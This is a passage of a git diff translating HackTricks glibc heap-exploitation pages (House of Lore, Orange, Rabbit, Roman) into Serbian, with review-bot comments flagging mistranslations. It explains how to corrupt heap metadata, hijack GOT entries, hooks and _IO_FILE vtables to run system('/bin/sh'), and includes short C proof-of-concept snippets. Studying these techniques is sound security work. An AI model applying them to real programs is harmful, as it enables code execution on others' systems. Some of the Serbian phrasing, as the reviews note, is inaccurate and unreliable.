I sa ovim libc curenjem bilo je moguće ponovo prepisati `atoi`-ov GOT sa adresom `system` i pozvati ga prosledivši kao parametar `/bin/sh` +- Alternativna metoda [predložena u ovom drugom izveštaju](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_force/#2016-bctf-bcloud) je da se prepisuje `free` sa `puts`, a zatim dodaje adresa `atoi@got`, u pokazivač koji će kasnije biti oslobođen tako da se curi i sa ovim curenjem ponovo prepisuje `atoi@got` sa `system` i poziva ga sa `/bin/sh`. - [https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html](https://guyinatuxedo.github.io/41-house_of_force/bkp16_cookbook/index.html) - - There is a UAF allowing to reuse a chunk that was freed without clearing the pointer. Because there are some read methods, it's possible to leak a libc address writing a pointer to the free function in the GOT here and then calling the read function. - - Then, House of force was used (abusing the UAF) to overwrite the size of the left space with a -1, allocate a chunk big enough to get tot he free hook, and then allocate another chunk which will contain the free hook. Then, write in the hook the address of `system`, write in a chunk `"/bin/sh"` and finally free the chunk with that string content. +- Postoji UAF koji omogućava ponovnu upotrebu dela koji je oslobođen bez brisanja pokazivača. Zbog nekih metoda čitanja, moguće je curiti libc adresu pisanjem pokazivača na funkciju free u GOT ovde i zatim pozivajući funkciju za čitanje. +- Zatim, House of force je korišćen (zloupotrebljavajući UAF) da prepiše veličinu preostalog prostora sa -1, alocira deo dovoljno veliki da dođe do free hook-a, a zatim alocira još jedan deo koji će sadržati free hook. Zatim, upisuje u hook adresu `system`, upisuje u deo `"/bin/sh"` i konačno oslobađa deo sa tim sadržajem. {{#include ../../banners/hacktricks-training.md}} 
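Review bot: the second shift-crops bullet inverts the stack layout. `koji u steku sledi adresu v2, koja zatim sledi označenoj **host name**` says that `s` follows the address of v2, which follows the host name; the source says the opposite ("which in the stack is followed by the address of v2, which is then followed by the indicated host name"), and the order matters because it is why overflowing `s` through the org name reaches the top chunk size via the host name. Suggest `iza kojeg u steku sledi adresa v2, a zatim navedeni **host name**`. Also, "leak" is rendered with the intransitive `curiti` (to drip) throughout the hunk (`bilo je moguće curiti adresu`, `tako da se curi`, `moguće je curiti libc adresu`); for "leak an address" use `procuriti`/`otkriti adresu`, or the borrowed `leak` that the house-of-orange hunk of this patch already uses (`Libc i heap leakovi`). In `pisanjem pokazivača na funkciju free u GOT ovde i zatim pozivajući funkciju za čitanje`, `pozivajući` should be `pozivanjem funkcije za čitanje` to agree with `pisanjem` earlier in the sentence.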
diff --git a/src/binary-exploitation/libc-heap/house-of-lore.md b/src/binary-exploitation/libc-heap/house-of-lore.md index 862ba7323..263821040 100644 --- a/src/binary-exploitation/libc-heap/house-of-lore.md +++ b/src/binary-exploitation/libc-heap/house-of-lore.md 
@@ -2,43 +2,43 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -### Code +### Kod -- Check the one from [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/) - - This isn't working -- Or: [https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c) - - This isn't working even if it tries to bypass some checks getting the error: `malloc(): unaligned tcache chunk detected` -- This example is still working: [**https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html**](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html) +- Proverite onaj sa [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/) +- Ovo ne radi +- Ili: [https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.39/house_of_lore.c) +- Ovo ne radi čak i ako pokušava da zaobiđe neke provere dobijajući grešku: `malloc(): unaligned tcache chunk detected` +- Ovaj primer još uvek radi: [**https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html**](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html) -### Goal +### Cilj -- Insert a **fake small chunk in the small bin so then it's possible to allocate it**.\ - Note that the small chunk added is the fake one the attacker creates and not a fake one in an arbitrary position. +- Umetnite **lažni mali deo u mali kontejner kako bi ga bilo moguće alocirati**.\ +Napomena: mali deo koji se dodaje je lažni koji napadač kreira, a ne lažni deo na proizvoljnom mestu. 
-### Requirements +### Zahtevi -- Create 2 fake chunks and link them together and with the legit chunk in the small bin: - - `fake0.bk` -> `fake1` - - `fake1.fd` -> `fake0` - - `fake0.fd` -> `legit` (you need to modify a pointer in the freed small bin chunk via some other vuln) - - `legit.bk` -> `fake0` +- Kreirajte 2 lažna dela i povežite ih zajedno i sa legitimnim delom u malom kontejneru: +- `fake0.bk` -> `fake1` +- `fake1.fd` -> `fake0` +- `fake0.fd` -> `legit` (morate modifikovati pokazivač u oslobođenom malom delu putem neke druge ranjivosti) +- `legit.bk` -> `fake0` -Then you will be able to allocate `fake0`. +Tada ćete moći da alocirate `fake0`. -### Attack +### Napad -- A small chunk (`legit`) is allocated, then another one is allocated to prevent consolidating with top chunk. Then, `legit` is freed (moving it to the unsorted bin list) and the a larger chunk is allocated, **moving `legit` it to the small bin.** -- An attacker generates a couple of fake small chunks, and makes the needed linking to bypass sanity checks: - - `fake0.bk` -> `fake1` - - `fake1.fd` -> `fake0` - - `fake0.fd` -> `legit` (you need to modify a pointer in the freed small bin chunk via some other vuln) - - `legit.bk` -> `fake0` -- A small chunk is allocated to get legit, making **`fake0`** into the top list of small bins -- Another small chunk is allocated, getting `fake0` as a chunk, allowing potentially to read/write pointers inside of it. +- Mali deo (`legit`) se alocira, zatim se alocira još jedan kako bi se sprečilo konsolidovanje sa vrhunskim delom. 
Zatim, `legit` se oslobađa (premestajući ga u listu nesortiranih delova) i alocira se veći deo, **premestajući `legit` u mali kontejner.** +- Napadač generiše nekoliko lažnih malih delova i pravi potrebna povezivanja da bi zaobišao provere: +- `fake0.bk` -> `fake1` +- `fake1.fd` -> `fake0` +- `fake0.fd` -> `legit` (morate modifikovati pokazivač u oslobođenom malom delu putem neke druge ranjivosti) +- `legit.bk` -> `fake0` +- Mali deo se alocira da bi se dobio legitiman, čineći **`fake0`** vrhunskim delom malih kontejnera +- Alocira se još jedan mali deo, dobijajući `fake0` kao deo, što potencijalno omogućava čitanje/pisanje pokazivača unutar njega. -## References +## Reference - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_lore/) - [https://heap-exploitation.dhavalkapil.com/attacks/house_of_lore](https://heap-exploitation.dhavalkapil.com/attacks/house_of_lore) diff --git a/src/binary-exploitation/libc-heap/house-of-orange.md b/src/binary-exploitation/libc-heap/house-of-orange.md index e57f477c6..f3391d3e1 100644 --- a/src/binary-exploitation/libc-heap/house-of-orange.md +++ b/src/binary-exploitation/libc-heap/house-of-orange.md 
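Review bot: `čineći **`fake0`** vrhunskim delom malih kontejnera` changes the meaning of the step. The source says that allocating `legit` leaves `fake0` at the head of the small bin list ("into the top list of small bins"); `vrhunskim delom` reads as "the top chunk", a different glibc object, and the one the hunk itself names two lines earlier for the real top chunk (`kako bi se sprečilo konsolidovanje sa vrhunskim delom`). Suggest `stavljajući **`fake0`** na početak liste small bin-a`. Terminology in this file also diverges from the rest of the patch: "small bin" becomes `mali kontejner` here while house-of-orange keeps `mali bin`/`nesortirani bin`, and "top chunk" is `vrhunski deo` here but `gornji deo` in house-of-force and house-of-orange and `gornji chunk` in house-of-rabbit. Pick one rendering per term (keeping `chunk`, `bin` and `fastbin` untranslated, as the house-of-rabbit hunk does, is the least ambiguous) and apply it across the patch.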
@@ -2,72 +2,72 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -### Code +### Kod -- Find an example in [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c) - - The exploitation technique was fixed in this [patch](https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=stdlib/abort.c;h=117a507ff88d862445551f2c07abb6e45a716b75;hp=19882f3e3dc1ab830431506329c94dcf1d7cc252;hb=91e7cf982d0104f0e71770f5ae8e3faf352dea9f;hpb=0c25125780083cbba22ed627756548efe282d1a0) so this is no longer working (working in earlier than 2.26) -- Same example **with more comments** in [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html) +- Pronađite primer na [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c) +- Tehnika eksploatacije je ispravljena u ovom [patchu](https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=stdlib/abort.c;h=117a507ff88d862445551f2c07abb6e45a716b75;hp=19882f3e3dc1ab830431506329c94dcf1d7cc252;hb=91e7cf982d0104f0e71770f5ae8e3faf352dea9f;hpb=0c25125780083cbba22ed627756548efe282d1a0) tako da ovo više ne funkcioniše (radi u verzijama pre 2.26) +- Isti primer **sa više komentara** na [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html) -### Goal +### Cilj -- Abuse `malloc_printerr` function +- Zloupotreba `malloc_printerr` funkcije -### Requirements +### Zahtevi -- Overwrite the top chunk size -- Libc and heap leaks +- Prepisivanje veličine gornjeg dela +- Libc i heap leakovi -### Background +### Pozadina -Some needed background from the comments from [**this 
example**](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)**:** +Neka potrebna pozadina iz komentara iz [**ovog primera**](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)**:** -Thing is, in older versions of libc, when the `malloc_printerr` function was called it would **iterate through a list of `_IO_FILE` structs stored in `_IO_list_all`**, and actually **execute** an instruction pointer in that struct.\ -This attack will forge a **fake `_IO_FILE` struct** that we will write to **`_IO_list_all`**, and cause `malloc_printerr` to run.\ -Then it will **execute whatever address** we have stored in the **`_IO_FILE`** structs jump table, and we will get code execution +Stvar je u tome da, u starijim verzijama libc, kada je pozvana `malloc_printerr` funkcija, ona bi **iterirala kroz listu `_IO_FILE` struktura smeštenih u `_IO_list_all`**, i zapravo **izvršila** pokazivač instrukcija u toj strukturi.\ +Ovaj napad će falsifikovati **lažnu `_IO_FILE` strukturu** koju ćemo napisati u **`_IO_list_all`**, i izazvati `malloc_printerr` da se pokrene.\ +Zatim će **izvršiti bilo koju adresu** koju imamo smeštenu u **`_IO_FILE`** tabeli skakanja, i dobićemo izvršenje koda. -### Attack +### Napad -The attack starts by managing to get the **top chunk** inside the **unsorted bin**. This is achieved by calling `malloc` with a size greater than the current top chunk size but smaller than **`mmp_.mmap_threshold`** (default is 128K), which would otherwise trigger `mmap` allocation. Whenever the top chunk size is modified, it's important to ensure that the **top chunk + its size** is page-aligned and that the **prev_inuse** bit of the top chunk is always set. +Napad počinje tako što se uspeva dobiti **gornji deo** unutar **nesortiranog bin-a**. 
To se postiže pozivanjem `malloc` sa veličinom većom od trenutne veličine gornjeg dela, ali manjom od **`mmp_.mmap_threshold`** (podrazumevano je 128K), što bi inače pokrenulo `mmap` alokaciju. Kada god se veličina gornjeg dela izmeni, važno je osigurati da je **gornji deo + njegova veličina** usklađena sa stranicom i da je **prev_inuse** bit gornjeg dela uvek postavljen. -To get the top chunk inside the unsorted bin, allocate a chunk to create the top chunk, change the top chunk size (with an overflow in the allocated chunk) so that **top chunk + size** is page-aligned with the **prev_inuse** bit set. Then allocate a chunk larger than the new top chunk size. Note that `free` is never called to get the top chunk into the unsorted bin. +Da biste dobili gornji deo unutar nesortiranog bin-a, alocirajte deo da biste stvorili gornji deo, promenite veličinu gornjeg dela (sa prelivanjem u alociranom delu) tako da **gornji deo + veličina** bude usklađen sa stranicom sa postavljenim **prev_inuse** bitom. Zatim alocirajte deo veći od nove veličine gornjeg dela. Imajte na umu da `free` nikada nije pozvan da bi se gornji deo stavio u nesortirani bin. -The old top chunk is now in the unsorted bin. Assuming we can read data inside it (possibly due to a vulnerability that also caused the overflow), it’s possible to leak libc addresses from it and get the address of **\_IO_list_all**. +Stari gornji deo je sada u nesortiranom bin-u. Pretpostavljajući da možemo čitati podatke unutar njega (moguće zbog ranjivosti koja je takođe izazvala prelivanje), moguće je iscuriti libc adrese iz njega i dobiti adresu **\_IO_list_all**. -An unsorted bin attack is performed by abusing the overflow to write `topChunk->bk->fwd = _IO_list_all - 0x10`. When a new chunk is allocated, the old top chunk will be split, and a pointer to the unsorted bin will be written into **`_IO_list_all`**. 
+Napad nesortiranog bin-a se vrši zloupotrebom prelivanja da bi se napisalo `topChunk->bk->fwd = _IO_list_all - 0x10`. Kada se alocira novi deo, stari gornji deo će biti podeljen, a pokazivač na nesortirani bin će biti napisan u **`_IO_list_all`**. -The next step involves shrinking the size of the old top chunk to fit into a small bin, specifically setting its size to **0x61**. This serves two purposes: +Sledeći korak uključuje smanjenje veličine starog gornjeg dela da bi stao u mali bin, posebno postavljajući njegovu veličinu na **0x61**. Ovo ima dva cilja: -1. **Insertion into Small Bin 4**: When `malloc` scans through the unsorted bin and sees this chunk, it will try to insert it into small bin 4 due to its small size. This makes the chunk end up at the head of the small bin 4 list which is the location of the FD pointer of the chunk of **`_IO_list_all`** as we wrote a close address in **`_IO_list_all`** via the unsorted bin attack. -2. **Triggering a Malloc Check**: This chunk size manipulation will cause `malloc` to perform internal checks. When it checks the size of the false forward chunk, which will be zero, it triggers an error and calls `malloc_printerr`. +1. **Umetanje u Mali Bin 4**: Kada `malloc` skenira nesortirani bin i vidi ovaj deo, pokušaće da ga umetne u mali bin 4 zbog njegove male veličine. Ovo čini da deo završi na vrhu liste malog bin-a 4, što je lokacija FD pokazivača dela **`_IO_list_all`** jer smo napisali blisku adresu u **`_IO_list_all`** putem napada nesortiranog bin-a. +2. **Pokretanje Malloc Provere**: Ova manipulacija veličinom dela će izazvati `malloc` da izvrši interne provere. Kada proverava veličinu lažnog naprednog dela, koja će biti nula, izaziva grešku i poziva `malloc_printerr`. -The manipulation of the small bin will allow you to control the forward pointer of the chunk. The overlap with **\_IO_list_all** is used to forge a fake **\_IO_FILE** structure. 
The structure is carefully crafted to include key fields like `_IO_write_base` and `_IO_write_ptr` set to values that pass internal checks in libc. Additionally, a jump table is created within the fake structure, where an instruction pointer is set to the address where arbitrary code (e.g., the `system` function) can be executed. +Manipulacija malim bin-om će vam omogućiti da kontrolišete napredni pokazivač dela. Preklapanje sa **\_IO_list_all** se koristi za falsifikovanje lažne **\_IO_FILE** strukture. Struktura je pažljivo oblikovana da uključuje ključna polja kao što su `_IO_write_base` i `_IO_write_ptr` postavljena na vrednosti koje prolaze interne provere u libc. Pored toga, tabela skakanja se kreira unutar lažne strukture, gde je pokazivač instrukcija postavljen na adresu gde se može izvršiti proizvoljan kod (npr. funkcija `system`). -To summarize the remaining part of the technique: +Da rezimiramo preostali deo tehnike: -- **Shrink the Old Top Chunk**: Adjust the size of the old top chunk to **0x61** to fit it into a small bin. -- **Set Up the Fake `_IO_FILE` Structure**: Overlap the old top chunk with the fake **\_IO_FILE** structure and set fields appropriately to hijack execution flow. +- **Smanjite Stari Gornji Deo**: Prilagodite veličinu starog gornjeg dela na **0x61** da bi stao u mali bin. +- **Postavite Lažnu `_IO_FILE` Strukturu**: Preklopite stari gornji deo sa lažnom **\_IO_FILE** strukturom i postavite polja odgovarajuće da preuzmete tok izvršenja. -The next step involves forging a fake **\_IO_FILE** structure that overlaps with the old top chunk currently in the unsorted bin. The first bytes of this structure are crafted carefully to include a pointer to a command (e.g., "/bin/sh") that will be executed. +Sledeći korak uključuje falsifikovanje lažne **\_IO_FILE** strukture koja se preklapa sa starim gornjim delom trenutno u nesortiranom bin-u. Prvi bajtovi ove strukture su pažljivo oblikovani da uključuju pokazivač na komandu (npr. 
"/bin/sh") koja će biti izvršena. -Key fields in the fake **\_IO_FILE** structure, such as `_IO_write_base` and `_IO_write_ptr`, are set to values that pass internal checks in libc. Additionally, a jump table is created within the fake structure, where an instruction pointer is set to the address where arbitrary code can be executed. Typically, this would be the address of the `system` function or another function that can execute shell commands. +Ključna polja u lažnoj **\_IO_FILE** strukturi, kao što su `_IO_write_base` i `_IO_write_ptr`, postavljena su na vrednosti koje prolaze interne provere u libc. Pored toga, tabela skakanja se kreira unutar lažne strukture, gde je pokazivač instrukcija postavljen na adresu gde se može izvršiti proizvoljan kod. Obično bi to bila adresa funkcije `system` ili druge funkcije koja može izvršiti shell komande. -The attack culminates when a call to `malloc` triggers the execution of the code through the manipulated **\_IO_FILE** structure. This effectively allows arbitrary code execution, typically resulting in a shell being spawned or another malicious payload being executed. +Napad kulminira kada poziv na `malloc` pokrene izvršenje koda kroz manipuliranu **\_IO_FILE** strukturu. Ovo efikasno omogućava izvršenje proizvoljnog koda, obično rezultirajući pokretanjem shel-a ili izvršavanjem drugog zlonamernog tereta. -**Summary of the Attack:** +**Rezime Napada:** -1. **Set up the top chunk**: Allocate a chunk and modify the top chunk size. -2. **Force the top chunk into the unsorted bin**: Allocate a larger chunk. -3. **Leak libc addresses**: Use the vulnerability to read from the unsorted bin. -4. **Perform the unsorted bin attack**: Write to **\_IO_list_all** using an overflow. -5. **Shrink the old top chunk**: Adjust its size to fit into a small bin. -6. **Set up a fake \_IO_FILE structure**: Forge a fake file structure to hijack control flow. -7. 
**Trigger code execution**: Allocate a chunk to execute the attack and run arbitrary code. +1. **Postavite gornji deo**: Alocirajte deo i izmenite veličinu gornjeg dela. +2. **Primorajte gornji deo u nesortirani bin**: Alocirajte veći deo. +3. **Iscurite libc adrese**: Iskoristite ranjivost da čitate iz nesortiranog bin-a. +4. **Izvršite napad nesortiranog bin-a**: Napišite u **\_IO_list_all** koristeći prelivanje. +5. **Smanjite stari gornji deo**: Prilagodite njegovu veličinu da stane u mali bin. +6. **Postavite lažnu \_IO_FILE strukturu**: Falsifikujte lažnu strukturu datoteke da preuzmete tok izvršenja. +7. **Pokrenite izvršenje koda**: Alocirajte deo da izvršite napad i pokrenete proizvoljan kod. -This approach exploits heap management mechanisms, libc information leaks, and heap overflows to achieve code execution without directly calling `free`. By carefully crafting the fake **\_IO_FILE** structure and placing it in the right location, the attack can hijack the control flow during standard memory allocation operations. This enables the execution of arbitrary code, potentially resulting in a shell or other malicious activities. +Ovaj pristup koristi mehanizme upravljanja heap-om, iscurivanje informacija iz libc i prelivanja heap-a da bi se postiglo izvršenje koda bez direktnog pozivanja `free`. Pažljivim oblikovanjem lažne **\_IO_FILE** strukture i njenim postavljanjem na pravo mesto, napad može preuzeti tok izvršenja tokom standardnih operacija alokacije memorije. Ovo omogućava izvršenje proizvoljnog koda, potencijalno rezultirajući shell-om ili drugim zlonamernim aktivnostima. -## References +## Reference - [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_orange/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_orange/) - [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html) 
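Review bot: "forward" is mistranslated as `napredni` (advanced) twice in this hunk, which makes the bin reasoning unreadable: `Kada proverava veličinu lažnog naprednog dela, koja će biti nula` and `omogućiti da kontrolišete napredni pokazivač dela`. Both refer to the `fd` (forward) pointer and the chunk it points to; use `fd (forward) pokazivač` / `lažnog fd chunk-a`, matching `FD pokazivača` already used in item 1 of the same hunk. Smaller points: `tabeli skakanja` for "jump table" should stay `jump table` (it is the `_IO_FILE` vtable, a fixed glibc term), `usklađen(a) sa stranicom` for "page-aligned" is clearer as `poravnat na granicu stranice`, and the link text `[patchu]` keeps the English noun with a Serbian case ending where `[zakrpi]` would match `zakrpljena` used in the house-of-force hunk of this patch.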
diff --git a/src/binary-exploitation/libc-heap/house-of-rabbit.md b/src/binary-exploitation/libc-heap/house-of-rabbit.md index 230b7c63e..461b8c441 100644 --- a/src/binary-exploitation/libc-heap/house-of-rabbit.md +++ b/src/binary-exploitation/libc-heap/house-of-rabbit.md 
@@ -2,110 +2,92 @@ {{#include ../../banners/hacktricks-training.md}} -### Requirements +### Zahtevi -1. **Ability to modify fast bin fd pointer or size**: This means you can change the forward pointer of a chunk in the fastbin or its size. -2. **Ability to trigger `malloc_consolidate`**: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks. +1. **Sposobnost modifikacije fast bin fd pokazivača ili veličine**: To znači da možete promeniti unapred pokazivač chunk-a u fastbin-u ili njegovu veličinu. +2. **Sposobnost aktiviranja `malloc_consolidate`**: To se može uraditi ili alokacijom velikog chunk-a ili spajanjem gornjeg chunk-a, što prisiljava heap da konsoliduje chunk-ove. -### Goals +### Ciljevi -1. **Create overlapping chunks**: To have one chunk overlap with another, allowing for further heap manipulations. -2. **Forge fake chunks**: To trick the allocator into treating a fake chunk as a legitimate chunk during heap operations. +1. **Kreirati preklapajuće chunk-ove**: Da jedan chunk preklapa drugi, omogućavajući dalju manipulaciju heap-om. +2. **Falsifikovati lažne chunk-ove**: Da prevarite alokator da tretira lažni chunk kao legitimni chunk tokom operacija na heap-u. -## Steps of the attack +## Koraci napada -### POC 1: Modify the size of a fast bin chunk +### POC 1: Modifikujte veličinu fast bin chunk-a -**Objective**: Create an overlapping chunk by manipulating the size of a fastbin chunk. - -- **Step 1: Allocate Chunks** +**Cilj**: Kreirati preklapajući chunk manipulacijom veličine fastbin chunk-a. +- **Korak 1: Alocirajte chunk-ove** ```cpp unsigned long* chunk1 = malloc(0x40); // Allocates a chunk of 0x40 bytes at 0x602000 unsigned long* chunk2 = malloc(0x40); // Allocates another chunk of 0x40 bytes at 0x602050 malloc(0x10); // Allocates a small chunk to change the fastbin state ``` +Dodeljujemo dva dela od po 0x40 bajtova. 
Ovi delovi će biti smešteni u brzi bin list nakon što budu oslobođeni. -We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fast bin list once freed. - -- **Step 2: Free Chunks** - +- **Korak 2: Oslobodi delove** ```cpp free(chunk1); // Frees the chunk at 0x602000 free(chunk2); // Frees the chunk at 0x602050 ``` +Osobađamo oba dela, dodajući ih na fastbin listu. -We free both chunks, adding them to the fastbin list. - -- **Step 3: Modify Chunk Size** - +- **Korak 3: Izmeni veličinu dela** ```cpp chunk1[-1] = 0xa1; // Modify the size of chunk1 to 0xa1 (stored just before the chunk at chunk1[-1]) ``` +Menjamo veličinu metapodataka `chunk1` na 0xa1. Ovo je ključni korak za prevaru alokatora tokom konsolidacije. -We change the size metadata of `chunk1` to 0xa1. This is a crucial step to trick the allocator during consolidation. - -- **Step 4: Trigger `malloc_consolidate`** - +- **Korak 4: Aktiviraj `malloc_consolidate`** ```cpp malloc(0x1000); // Allocate a large chunk to trigger heap consolidation ``` +Dodeljivanje velikog dela pokreće funkciju `malloc_consolidate`, spajajući male delove u brzim binovima. Manipulisana veličina `chunk1` uzrokuje da se preklapa sa `chunk2`. -Allocating a large chunk triggers the `malloc_consolidate` function, merging small chunks in the fast bin. The manipulated size of `chunk1` causes it to overlap with `chunk2`. +Nakon konsolidacije, `chunk1` se preklapa sa `chunk2`, omogućavajući dalju eksploataciju. -After consolidation, `chunk1` overlaps with `chunk2`, allowing for further exploitation. +### POC 2: Izmenite `fd` pokazivač -### POC 2: Modify the `fd` pointer - -**Objective**: Create a fake chunk by manipulating the fast bin `fd` pointer. - -- **Step 1: Allocate Chunks** +**Cilj**: Kreirati lažni deo manipulacijom `fd` pokazivača brzog bina. 
+- **Korak 1: Dodelite delove** ```cpp unsigned long* chunk1 = malloc(0x40); // Allocates a chunk of 0x40 bytes at 0x602000 unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x602050 ``` +**Objašnjenje**: Alociramo dva dela, jedan manji i jedan veći, da bismo postavili heap za lažni deo. -**Explanation**: We allocate two chunks, one smaller and one larger, to set up the heap for the fake chunk. - -- **Step 2: Create fake chunk** - +- **Korak 2: Kreiraj lažni deo** ```cpp chunk2[1] = 0x31; // Fake chunk size 0x30 chunk2[7] = 0x21; // Next fake chunk chunk2[11] = 0x21; // Next-next fake chunk ``` +Pišemo lažne metapodatke o delu u `chunk2` da simuliramo manje delove. -We write fake chunk metadata into `chunk2` to simulate smaller chunks. - -- **Step 3: Free `chunk1`** - +- **Korak 3: Oslobodi `chunk1`** ```cpp free(chunk1); // Frees the chunk at 0x602000 ``` +**Objašnjenje**: Oslobađamo `chunk1`, dodajući ga na fastbin listu. -**Explanation**: We free `chunk1`, adding it to the fastbin list. - -- **Step 4: Modify `fd` of `chunk1`** - +- **Korak 4: Izmenite `fd` od `chunk1`** ```cpp chunk1[0] = 0x602060; // Modify the fd of chunk1 to point to the fake chunk within chunk2 ``` +**Objašnjenje**: Menjamo prednji pokazivač (`fd`) `chunk1` da pokazuje na naš lažni chunk unutar `chunk2`. -**Explanation**: We change the forward pointer (`fd`) of `chunk1` to point to our fake chunk inside `chunk2`. - -- **Step 5: Trigger `malloc_consolidate`** - +- **Korak 5: Aktiviraj `malloc_consolidate`** ```cpp malloc(5000); // Allocate a large chunk to trigger heap consolidation ``` +Dodeljivanje velikog dela ponovo pokreće `malloc_consolidate`, koji obrađuje lažni deo. -Allocating a large chunk again triggers `malloc_consolidate`, which processes the fake chunk. +Lažni deo postaje deo fastbin liste, čineći ga legitimnim delom za dalju eksploataciju. -The fake chunk becomes part of the fastbin list, making it a legitimate chunk for further exploitation. 
+### Sažetak -### Summary - -The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills. +Tehnika **House of Rabbit** uključuje ili modifikovanje veličine fast bin dela kako bi se stvorili preklapajući delovi ili manipulaciju `fd` pokazivačem za kreiranje lažnih delova. Ovo omogućava napadačima da falsifikuju legitimne delove u heap-u, omogućavajući različite oblike eksploatacije. Razumevanje i vežbanje ovih koraka će poboljšati vaše veštine eksploatacije heap-a. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/house-of-roman.md b/src/binary-exploitation/libc-heap/house-of-roman.md index a3deaf939..0939d3f85 100644 --- a/src/binary-exploitation/libc-heap/house-of-roman.md +++ b/src/binary-exploitation/libc-heap/house-of-roman.md 
@@ -2,87 +2,82 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -This was a very interesting technique that allowed for RCE without leaks via fake fastbins, the unsorted_bin attack and relative overwrites. However it has ben [**patched**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c). +Ovo je bila veoma zanimljiva tehnika koja je omogućila RCE bez leak-ova putem lažnih fastbins, napada na unsorted_bin i relativnih prepisivanja. Međutim, to je [**zakrpljeno**](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c). -### Code +### Kod -- You can find an example in [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c) +- Možete pronaći primer na [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c) -### Goal +### Cilj -- RCE by abusing relative pointers +- RCE zloupotrebom relativnih pokazivača -### Requirements +### Zahtevi -- Edit fastbin and unsorted bin pointers -- 12 bits of randomness must be brute forced (0.02% chance) of working +- Urediti fastbin i unsorted bin pokazivače +- 12 bita nasumičnosti mora biti brute-forced (0.02% šanse) da bi radilo -## Attack Steps +## Koraci napada -### Part 1: Fastbin Chunk points to \_\_malloc_hook +### Deo 1: Fastbin Chunk pokazuje na \_\_malloc_hook -Create several chunks: +Kreirajte nekoliko chunk-ova: -- `fastbin_victim` (0x60, offset 0): UAF chunk later to edit the heap pointer later to point to the LibC value. -- `chunk2` (0x80, offset 0x70): For good alignment +- `fastbin_victim` (0x60, offset 0): UAF chunk koji će kasnije urediti pokazivač na heap da pokazuje na LibC vrednost. 
+- `chunk2` (0x80, offset 0x70): Za dobru poravnanje - `main_arena_use` (0x80, offset 0x100) -- `relative_offset_heap` (0x60, offset 0x190): relative offset on the 'main_arena_use' chunk +- `relative_offset_heap` (0x60, offset 0x190): relativni offset na 'main_arena_use' chunk -Then `free(main_arena_use)` which will place this chunk in the unsorted list and will get a pointer to `main_arena + 0x68` in both the `fd` and `bk` pointers. +Zatim `free(main_arena_use)` koji će staviti ovaj chunk u unsorted listu i dobiti pokazivač na `main_arena + 0x68` u oba `fd` i `bk` pokazivača. -Now it's allocated a new chunk `fake_libc_chunk(0x60)` because it'll contain the pointers to `main_arena + 0x68` in `fd` and `bk`. - -Then `relative_offset_heap` and `fastbin_victim` are freed. +Sada se alocira novi chunk `fake_libc_chunk(0x60)` jer će sadržati pokazivače na `main_arena + 0x68` u `fd` i `bk`. +Zatim se `relative_offset_heap` i `fastbin_victim` oslobađaju. ```c /* Current heap layout: - 0x0: fastbin_victim - size 0x70 - 0x70: alignment_filler - size 0x90 - 0x100: fake_libc_chunk - size 0x70 (contains a fd ptr to main_arena + 0x68) - 0x170: leftover_main - size 0x20 - 0x190: relative_offset_heap - size 0x70 +0x0: fastbin_victim - size 0x70 +0x70: alignment_filler - size 0x90 +0x100: fake_libc_chunk - size 0x70 (contains a fd ptr to main_arena + 0x68) +0x170: leftover_main - size 0x20 +0x190: 